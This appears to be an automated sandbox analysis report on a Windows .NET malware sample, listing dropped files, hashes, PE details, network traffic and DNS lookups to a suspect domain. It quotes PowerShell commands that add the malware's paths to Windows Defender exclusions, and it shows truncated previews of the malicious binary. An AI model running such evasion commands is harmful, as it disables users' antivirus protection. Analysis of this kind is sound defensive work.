                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210408110230..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216554 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\lfQuSBwdSf.exe -Force..Process ID: 720..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210408110231..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\lfQuSBwdSf.exe -Force..
                                                    C:\Users\user\Documents\20210408\PowerShell_transcript.216554.Pgu86VMD.20210408110201.txt
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):862
                                                    Entropy (8bit):5.359412750263977
                                                    Encrypted:false
                                                    SSDEEP:24:BxSAYxvBndx2DOXUWeSuMG1OWXHjeTKKjX4CIym1ZJXZuMG1C:BZsvhdoO+SqPXqDYB1Zzqg
                                                    MD5:668F65C7B522C96ACB85A8AAF637EF96
                                                    SHA1:56D58F4E00C02FBC9E5356CB0F41AAC8F39AE683
                                                    SHA-256:75FCC43B2DB59D46B2645D868015C09830BC71A423251C9DA05C6D45584528AB
                                                    SHA-512:1369B9032D0A3840191BDB50068959A32E7142D3DE22AE44BAE0B5B287255E52BBF8EA2C147A753A4D4ED561C6C4C81C60EB19DCE1B164810D10DFF48AEAA05B
                                                    Malicious:false
                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210408110225..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216554 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe -Force..Process ID: 1004..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210408110226..**********************..PS>Add-MpPreference -ExclusionPath C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe -Force..
                                                    C:\Users\user\WrdAHTtKmtDmuc
                                                    Process:C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):5832256
                                                    Entropy (8bit):3.076288730928143
                                                    Encrypted:false
                                                    SSDEEP:12288:g/K5NquGjzowGM2Qn7QJi/7goLuPp393mcN6z03z9aLIG6ades08zoX4sm21Tgtk:Te8zlte8zld6StGZPve8zld6StGZPT
                                                    MD5:41E25385DEA56C5FFE7F052EA7EC9865
                                                    SHA1:B2B5504C508D07EC073718C953237A265F37B3A9
                                                    SHA-256:C941110415F3819464D4A8D0A8EA8B7CA31FB22C576EBD850DD2F24AA55D118F
                                                    SHA-512:76A0D7A15DF9595B82723D1A0696F57423683506FD40F73FB66974BE770BCD379908FB26D735E38547C5429B985A18130F52C997738D83EF274350BCBE95659B
                                                    Malicious:false
                                                    Preview: 77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 128 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 80 69 0 0 76 1 3 0 76 142 41 180 0 0 0 0 0 0 0 0 224 0 34 0 11 1 80 0 0 114 13 0 0 6 0 0 0 0 0 0 110 144 13 0 0 32 0 0 0 160 13 0 0 0 0 128 0 32 0 0 0 2 0 0 4 0 0 0 0 0 0 0 4 0 0 0 0 0 0 0 0 224 13 0 0 2 0 0 0 0 0 0 2 0 64 133 0 0 16 0 0 16 0 0 0 0 16 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 32 144 13 0 75 0 0 0 0 160 13 0 212 3 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 192 13 0 12 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 8 0 0 0 0 0 0 0 0 0 0 0 8 32 0 0 72 0 0 0 0 0 0 0 0 0 0 0 46 116 101 120 116 0 0 0 116 112 13 0 0 32 0 0 0 114 13 0 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0
                                                    C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe
                                                    Process:C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):46080
                                                    Entropy (8bit):5.842547697365067
                                                    Encrypted:false
                                                    SSDEEP:384:GrrHzbTWuxdvMvNZeA7JLtNnE27w/yvej5VLUJflhAtRtkDo3mC05aESzAdG4caM:GrrHzbJx4so8yiGfluTcU
                                                    MD5:0802967C1D72DEEB4E1B79AF74FDB553
                                                    SHA1:F8EDBBED8318311F070167C73FCCA9F63F79C905
                                                    SHA-256:201872C79F07606D9874BC471ACF1999E0EEF0703E73C71A4A297EB56C70BCFB
                                                    SHA-512:7566FF29FD3D743AD92543540A42AEC7731B996D171A0197971812396B8221387495F8AC1606D647ABDB888B630D1273C4207A800FA886CCB1E59029D1B86153
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..h...J........... ........@.. ....................... ............@....................................O.......dF...........r............................................................... ............... ..H............text...$f... ...h.................. ..`.rsrc...dF.......H...j..............@..@.reloc..............................@..B........................H........5...P...........................................................*".(.....*Vs....(....t.........*".(.....*R.(.......s....}....*6.(....o,....*....0...........~.....+..*..0..9........r...p..((....r...p.(......(......,...(.....+..~.....+..*....0..#........r...p..((....r...p.(.......(.....*..0..9........s.....+........o....o.....o....,...o........o....o.....*....0...........(....o.....+.+........*.0.. ........r#..p.+..........s......%r9..p .........%.r...p.%.r...p.%.r...p
                                                    C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe:Zone.Identifier
                                                    Process:C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:modified
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:true
                                                    Preview: [ZoneTransfer]....ZoneId=0
                                                    C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                    Process:C:\Windows\System32\svchost.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):55
                                                    Entropy (8bit):4.306461250274409
                                                    Encrypted:false
                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                    Malicious:false
                                                    Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):5.842547697365067
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                    • Win32 Executable (generic) a (10002005/4) 49.93%
                                                    • Windows Screen Saver (13104/52) 0.07%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    • DOS Executable Generic (2002/1) 0.01%
                                                    File name:lfQuSBwdSf.exe
                                                    File size:46080
                                                    MD5:0802967c1d72deeb4e1b79af74fdb553
                                                    SHA1:f8edbbed8318311f070167c73fcca9f63f79c905
                                                    SHA256:201872c79f07606d9874bc471acf1999e0eef0703e73c71a4a297eb56c70bcfb
                                                    SHA512:7566ff29fd3d743ad92543540a42aec7731b996d171a0197971812396b8221387495f8ac1606d647abdb888b630d1273c4207a800fa886ccb1e59029d1b86153
                                                    SSDEEP:384:GrrHzbTWuxdvMvNZeA7JLtNnE27w/yvej5VLUJflhAtRtkDo3mC05aESzAdG4caM:GrrHzbJx4so8yiGfluTcU
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..h...J........... ........@.. ....................... ............@................................

                                                    File Icon

                                                    Icon Hash:30828a8c8c828010

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x40861e
                                                    Entrypoint Section:.text
                                                    Digitally signed:true
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                    Time Stamp:0xEDF52E0E [Wed Jul 4 19:25:02 2096 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:v4.0.30319
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                    Authenticode Signature

                                                    Signature Valid:
                                                    Signature Issuer:
                                                    Signature Validation Error:
                                                    Error Number:
                                                    Not Before, Not After
                                                      Subject Chain
                                                        Version:
                                                        Thumbprint MD5:
                                                        Thumbprint SHA-1:
                                                        Thumbprint SHA-256:
                                                        Serial:

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp dword ptr [00402000h]

                                                        Data Directories

                                                        Name | Virtual Address | Virtual Size | Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x85cc | 0x4f | .text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa000 | 0x4664 | .rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x7200 | 0x14e0 |
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x10000 | 0xc | .reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                        Sections

                                                        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                        .text | 0x2000 | 0x6624 | 0x6800 | False | 0.332594651442 | data | 6.27050186695 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                        .rsrc | 0xa000 | 0x4664 | 0x4800 | False | 0.14892578125 | data | 4.10630489014 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc | 0x10000 | 0xc | 0x200 | False | 0.044921875 | data | 0.0815394123432 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        Name | RVA | Size | Type | Language | Country
                                                        RT_ICON | 0xa130 | 0x4028 | dBase III DBT, version number 0, next free block index 40 | |
                                                        RT_GROUP_ICON | 0xe158 | 0x14 | data | |
                                                        RT_VERSION | 0xe16c | 0x30c | data | |
                                                        RT_MANIFEST | 0xe478 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                                        Imports

                                                        DLL | Import
                                                        mscoree.dll | _CorExeMain

                                                        Version Infos

                                                        Description | Data
                                                        Translation | 0x0000 0x04b0
                                                        LegalCopyright | Copyright 2021
                                                        Assembly Version | 1.0.0.0
                                                        InternalName | Dimbono.exe
                                                        FileVersion | 1.0.0.0
                                                        CompanyName |
                                                        LegalTrademarks |
                                                        Comments |
                                                        ProductName | Dimbono
                                                        ProductVersion | 1.0.0.0
                                                        FileDescription | Dimbono
                                                        OriginalFilename | Dimbono.exe

                                                        Network Behavior

                                                        Network Port Distribution

                                                        TCP Packets

                                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                        Apr 8, 2021 11:01:45.396609068 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:45.397416115 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.397454023 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.397475004 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.397476912 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:45.397500038 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.397509098 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:45.398221016 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.398251057 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.398266077 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:45.398274899 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.398303032 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.398320913 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:45.399104118 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.399136066 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.399157047 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:45.399213076 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.399233103 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.399250031 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:45.399724007 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.399749994 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.399769068 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:45.399821997 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.399857998 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:45.399858952 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.400578022 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.400609970 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.400633097 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:45.400635004 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.400672913 CEST49701443192.168.2.3104.21.56.119
                                                        Apr 8, 2021 11:01:45.412417889 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.412455082 CEST44349701104.21.56.119192.168.2.3
                                                        Apr 8, 2021 11:01:45.412477016 CEST44349701104.21.56.119192.168.2.3

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 8, 2021 11:01:38.755899906 CEST | 50200 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:01:38.775214911 CEST | 53 | 50200 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:01:40.972173929 CEST | 51281 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:01:40.984234095 CEST | 53 | 51281 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:01:41.679163933 CEST | 49199 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:01:41.692414045 CEST | 53 | 49199 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:01:44.681437016 CEST | 50620 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:01:44.724883080 CEST | 53 | 50620 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:01:44.803056002 CEST | 64938 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:01:44.847248077 CEST | 53 | 64938 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:01:56.968020916 CEST | 60152 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:01:56.980468035 CEST | 53 | 60152 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:02:02.752123117 CEST | 57544 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:02:02.764671087 CEST | 53 | 57544 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:02:03.696585894 CEST | 55984 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:02:03.709362984 CEST | 53 | 55984 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:02:05.024367094 CEST | 64185 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:02:05.036798000 CEST | 53 | 64185 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:02:09.424561977 CEST | 65110 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:02:09.451386929 CEST | 53 | 65110 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:02:11.972204924 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:02:11.984787941 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:02:13.304059029 CEST | 63492 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:02:13.316571951 CEST | 53 | 63492 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:02:15.070406914 CEST | 60831 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:02:15.082360983 CEST | 53 | 60831 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:02:16.156286955 CEST | 60100 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:02:16.168801069 CEST | 53 | 60100 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:02:24.921981096 CEST | 53195 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:02:24.934926033 CEST | 53 | 53195 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:02:27.071579933 CEST | 50141 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:02:27.085139990 CEST | 53 | 50141 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:02:28.164998055 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:02:28.176840067 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:02:29.803163052 CEST | 49563 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:02:29.815573931 CEST | 53 | 49563 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:02:30.633725882 CEST | 51352 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:02:30.646882057 CEST | 53 | 51352 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:02:30.671216965 CEST | 59349 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:02:30.683943987 CEST | 53 | 59349 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:02:34.746850014 CEST | 57084 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:02:34.758682013 CEST | 53 | 57084 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:02:34.833126068 CEST | 58823 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:02:34.845623016 CEST | 53 | 58823 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:02:37.806899071 CEST | 57568 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:02:37.819520950 CEST | 53 | 57568 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:02:52.069416046 CEST | 50540 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:02:52.087430000 CEST | 53 | 50540 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:02:54.568016052 CEST | 54366 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:02:54.587409973 CEST | 53 | 54366 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:03:03.610271931 CEST | 53034 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:03:03.622721910 CEST | 53 | 53034 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:03:04.713150978 CEST | 57762 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:03:04.725918055 CEST | 53 | 57762 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:03:11.841286898 CEST | 55435 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:03:11.854012012 CEST | 53 | 55435 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:03:12.067235947 CEST | 50713 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:03:12.079967022 CEST | 53 | 50713 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:03:12.087239981 CEST | 56132 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:03:12.099225998 CEST | 53 | 56132 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:03:12.367260933 CEST | 58987 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:03:12.386113882 CEST | 53 | 58987 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:03:12.953145027 CEST | 56579 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:03:12.965672970 CEST | 53 | 56579 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:03:14.239921093 CEST | 60633 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:03:14.253173113 CEST | 53 | 60633 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:03:17.115955114 CEST | 61292 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:03:17.128592968 CEST | 53 | 61292 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:03:19.774718046 CEST | 63619 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:03:19.801333904 CEST | 53 | 63619 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:03:29.444453955 CEST | 64938 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:03:29.457216024 CEST | 53 | 64938 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:03:29.460191011 CEST | 61946 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:03:29.472771883 CEST | 53 | 61946 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:03:29.958946943 CEST | 64910 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:03:29.971657991 CEST | 53 | 64910 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:03:31.398861885 CEST | 52123 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:03:31.411643982 CEST | 53 | 52123 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:03:33.603425980 CEST | 56130 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:03:33.617084980 CEST | 53 | 56130 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:03:35.694166899 CEST | 56338 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:03:35.712686062 CEST | 53 | 56338 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:04:07.707721949 CEST | 59420 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:04:07.720654011 CEST | 53 | 59420 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:04:08.340862989 CEST | 58784 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:04:08.372174978 CEST | 53 | 58784 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 11:04:27.249521017 CEST | 63978 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 11:04:27.343425035 CEST | 53 | 63978 | 8.8.8.8 | 192.168.2.3

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Apr 8, 2021 11:01:44.681437016 CEST | 192.168.2.3 | 8.8.8.8 | 0x9e2d | Standard query (0) | myliverpoolnews.cf | A (IP address) | IN (0x0001)
Apr 8, 2021 11:01:44.803056002 CEST | 192.168.2.3 | 8.8.8.8 | 0x4547 | Standard query (0) | myliverpoolnews.cf | A (IP address) | IN (0x0001)
Apr 8, 2021 11:02:34.746850014 CEST | 192.168.2.3 | 8.8.8.8 | 0x4c9d | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001)
Apr 8, 2021 11:02:34.833126068 CEST | 192.168.2.3 | 8.8.8.8 | 0xd4a3 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001)
Apr 8, 2021 11:02:54.568016052 CEST | 192.168.2.3 | 8.8.8.8 | 0x8bcb | Standard query (0) | freegeoip.app | A (IP address) | IN (0x0001)
Apr 8, 2021 11:03:12.067235947 CEST | 192.168.2.3 | 8.8.8.8 | 0x7afe | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001)
Apr 8, 2021 11:03:12.087239981 CEST | 192.168.2.3 | 8.8.8.8 | 0xf800 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001)
Apr 8, 2021 11:03:12.367260933 CEST | 192.168.2.3 | 8.8.8.8 | 0xc04 | Standard query (0) | freegeoip.app | A (IP address) | IN (0x0001)
Apr 8, 2021 11:03:29.444453955 CEST | 192.168.2.3 | 8.8.8.8 | 0x6506 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001)
Apr 8, 2021 11:03:29.460191011 CEST | 192.168.2.3 | 8.8.8.8 | 0xca10 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001)
Apr 8, 2021 11:03:29.958946943 CEST | 192.168.2.3 | 8.8.8.8 | 0xc9a5 | Standard query (0) | freegeoip.app | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Apr 8, 2021 11:01:44.724883080 CEST | 8.8.8.8 | 192.168.2.3 | 0x9e2d | No error (0) | myliverpoolnews.cf |  | 104.21.56.119 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:01:44.724883080 CEST | 8.8.8.8 | 192.168.2.3 | 0x9e2d | No error (0) | myliverpoolnews.cf |  | 172.67.150.212 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:01:44.847248077 CEST | 8.8.8.8 | 192.168.2.3 | 0x4547 | No error (0) | myliverpoolnews.cf |  | 104.21.56.119 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:01:44.847248077 CEST | 8.8.8.8 | 192.168.2.3 | 0x4547 | No error (0) | myliverpoolnews.cf |  | 172.67.150.212 | A (IP address) | IN (0x0001)
